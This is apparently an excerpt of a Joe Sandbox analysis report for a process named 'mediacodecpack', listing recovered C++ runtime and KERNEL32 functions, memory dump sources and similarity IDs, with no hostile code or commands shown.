• API String ID: 249634027-1638339373
APIs
• __EH_prolog.LIBCMT ref: 02D43BD8
• std::bad_exception::bad_exception.LIBCMT ref: 02D43BED
  • Part of subcall function 02D514C7: std::exception::exception.LIBCMT ref: 02D514D1
  • Part of subcall function 02D4965B: __EH_prolog.LIBCMT ref: 02D49660
  • Part of subcall function 02D4965B: __CxxThrowException@8.LIBCMT ref: 02D49689
Strings
Memory Dump Source
• Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
Yara matches
Similarity
• API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
• String ID: bad cast
• API String ID: 1300498068-3145022300
APIs
• EnterCriticalSection.KERNEL32(?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4DF
• TlsGetValue.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4F5
• GetLastError.KERNEL32(?,?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4FD
• LeaveCriticalSection.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D520
Memory Dump Source
• Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
Similarity
• API ID: CriticalSection$EnterErrorLastLeaveValue
• String ID:
• API String ID: 682475483-0